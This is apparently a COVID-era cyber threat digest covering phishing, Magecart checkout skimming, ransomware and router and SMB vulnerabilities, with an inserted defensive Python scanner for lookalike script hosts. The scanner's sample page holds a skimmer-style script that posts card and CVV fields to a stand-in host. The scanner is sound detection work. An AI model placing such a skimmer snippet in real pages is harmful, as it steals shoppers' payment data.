While overall organised crime volumes remain broadly constant, there has been a shift to COVID-19 themed phishing campaigns and fraudulent websites as organised crime groups seek to monetise the fear, uncertainty and doubt many people feel during the pandemic.
A wide range of COVID-19 related financial scams are in progress.
— The FBI has issued an alert about threat actors exploiting mobile banking apps, warning of fake banking apps and banking trojans now that mobile banking use has surged 50% since the beginning of 2020.
— Magecart hackers compromised the networks of international retail chain Claire’s and sportswear retailer Intersport amid the increase in online shopping during the coronavirus pandemic. The attackers injected malicious JavaScript into the retailers’ checkout pages, which sent customer payment data to an attacker-registered lookalike domain, ‘claires-assets.com’, Security Week reports.
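The Magecart case above is an example of a client-side skimmer: injected script copies payment form data and posts it to a domain the attacker registered to look like the brand. The following Python script is an added example (not code from the original report or from any of the retailers) of the basic static check a defender can run over a checkout page: collect every host referenced by external and inline scripts, compare them against a first-party allowlist, and tag any unknown host that reuses a brand token as a lookalike. The page HTML, the hosts `shop.example` / `shop-assets.example`, and the allowlist are all constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external <script src=...> URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of every <script src=...>
        self.inline = []        # text of every inline <script> block
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


# Absolute http(s) URLs appearing as literals inside inline script text.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s'\"]*)?")


def _host_allowed(host, allowed_hosts):
    # A host passes if it is an allowlisted host or a subdomain of one.
    return any(host == a or host.endswith("." + a) for a in allowed_hosts)


def find_suspect_hosts(html, allowed_hosts, brand_tokens):
    """Return sorted (host, reason) pairs for every script-referenced host that
    is not first party. Hosts embedding a brand token are tagged as lookalikes,
    the pattern of the skimmer domain described in the Claire's incident."""
    p = ScriptCollector()
    p.feed(html)
    urls = list(p.external)
    for body in p.inline:
        urls.extend(URL_RE.findall(body))
    findings = {}
    for u in urls:
        host = urlparse(u).hostname
        if not host or _host_allowed(host, allowed_hosts):
            continue
        reason = "unknown third party"
        if any(t in host for t in brand_tokens):
            reason = "brand lookalike"
        findings[host] = reason
    return sorted(findings.items())


# Constructed checkout page: one legitimate CDN script plus an injected,
# skimmer-shaped inline script that posts the payment form to a lookalike host.
SAMPLE_HTML = """
<html><body>
<form id="pay"><input name="card"><input name="cvv"></form>
<script src="https://cdn.shop.example/js/checkout.js"></script>
<script>
  document.getElementById('pay').addEventListener('submit', function () {
    var data = new FormData(document.getElementById('pay'));
    fetch('https://shop-assets.example/collect', {method: 'POST', body: data});
  });
</script>
</body></html>
"""

ALLOWED_HOSTS = {"shop.example"}   # constructed first-party domain; cdn.shop.example passes as a subdomain
BRAND_TOKENS = ("shop",)           # tokens an attacker would reuse in a lookalike domain


def scan_sample():
    return find_suspect_hosts(SAMPLE_HTML, ALLOWED_HOSTS, BRAND_TOKENS)


if __name__ == "__main__":
    for host, reason in scan_sample():
        print(f"{host}: {reason}")
```

This catches the plain case only: real skimmers usually build the exfiltration URL from concatenated or encoded strings, so a literal-URL scan should be paired with a `Content-Security-Policy` whose `connect-src` and `form-action` directives name only first-party hosts, and with monitoring of the hosts the checkout page actually contacts in the browser.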
Organised crime groups continue to build out attack infrastructure aimed at corporations.
— As of June 12 there were 106,407 registered domain names containing COVID-19 keywords, RiskIQ reports.
A range of other exploitation techniques target the widespread use of conferencing platforms.
— A new phishing campaign uses fake conferencing-platform meeting invitations to steal Microsoft credentials from users, Cofense reports.
Mobile devices are not immune from COVID-19 themed attacks.
— Researchers have identified 12 malicious Android apps disguised as official government COVID-19 contact tracing apps; they carry the Anubis banking trojan and the SpyNote remote access trojan, which harvest and monitor device data, Dark Reading reports.
Phishing and Malware
Extensive COVID-19 themed phishing campaigns are underway with cyber criminals exploiting health organisations, government agencies, individuals, enterprises and their IT infrastructure:
— A COVID-19 themed phishing attack exploits government efforts to provide relief funds to small business owners: the emails are sent from an official Dropbox domain but lead to a fake login page that steals Microsoft credentials, Abnormal Security reports.
— A major car manufacturer has suffered a SNAKE ransomware attack, infecting internal servers and suspending production around the world, Dark Reading reports.
— A COVID-19 themed phishing campaign targets OneDrive users to steal their credentials, impersonating government officials who are sharing a document containing the latest COVID-19 questionnaire, McAfee reports.
— A European power company has been hit by SNAKE ransomware affecting its internal IT network, Bleeping Computer reports.
— The South African Life Healthcare Group suffered a cyberattack that took down its email servers, business processing and patient admission systems, Sunday Times reports.
Broader threat landscape
— The Australian Government has warned of sustained targeting of government bodies and companies by a sophisticated state-based actor using proof-of-concept exploit code, web shells and other tools copied from open sources.
— An Indian based hack-for-hire group, BellTroX, has allegedly targeted thousands of high-profile individuals and hundreds of organizations worldwide in a seven-year-long phishing campaign to steal data and conduct commercial espionage on behalf of their clients, The Hacker News reports.
Ransomware against cities
— The city of Knoxville, Tennessee, has been hit by an as yet unidentified ransomware strain, forcing it to shut down its computer network and services, ZDNet reports.
— The city of Florence, Alabama, has been hit with a ransomware attack, with the city agreeing to pay $300,000 to decrypt its files, Info Security Magazine reports.
Other breaches and vulnerabilities
— Hackers breached the systems of A1 Telekom, Austria’s leading mobile network operator, with malware and planted multiple backdoors in November 2019. The intruders are suspected to be members of the China-linked APT Gallium, ZDNet reports.
— Around 300,000 accounts of the Japanese gaming giant Nintendo have been breached; the attackers used the hijacked accounts to make fraudulent purchases in popular games through linked PayPal accounts, and may have gained access to personal information such as dates of birth and email addresses, CNN reports.
— Microsoft has released its June Patch Tuesday update with fixes for 129 vulnerabilities, the most it has patched in a single month, including 11 critical remote code-execution flaws in Windows, VBScript and SharePoint Server, Threat Post reports.
— Two new attacks against modern Intel processors, SGAxe and CrossTalk, have been disclosed. SGAxe can extract sensitive data, including attestation keys, from SGX enclaves, while CrossTalk leaks data across CPU cores through a shared staging buffer, The Hacker News reports.
— A new vulnerability, CVE-2020-1206 (SMBleed), affects the SMBv3 protocol: a specially crafted packet sent to an SMBv3 server lets an unauthenticated attacker leak kernel memory remotely, and the researchers who found it showed that chaining it with the earlier SMBGhost bug (CVE-2020-0796) can lead to remote code execution, The Hacker News reports.
— Six new vulnerabilities have been found in D-Link DIR-865L home routers, a model that has reached end of life and will not be patched. The most critical, CVE-2020-13782, is a command injection flaw that allows arbitrary command execution on the device, so affected users should replace it, Unit 42 researchers report.
— The FBI has issued an alert about an increase in fraud targeting the public and the shipping industry, in which scammers cite fake COVID-19 shipping laws and charge additional fees before delivering a product.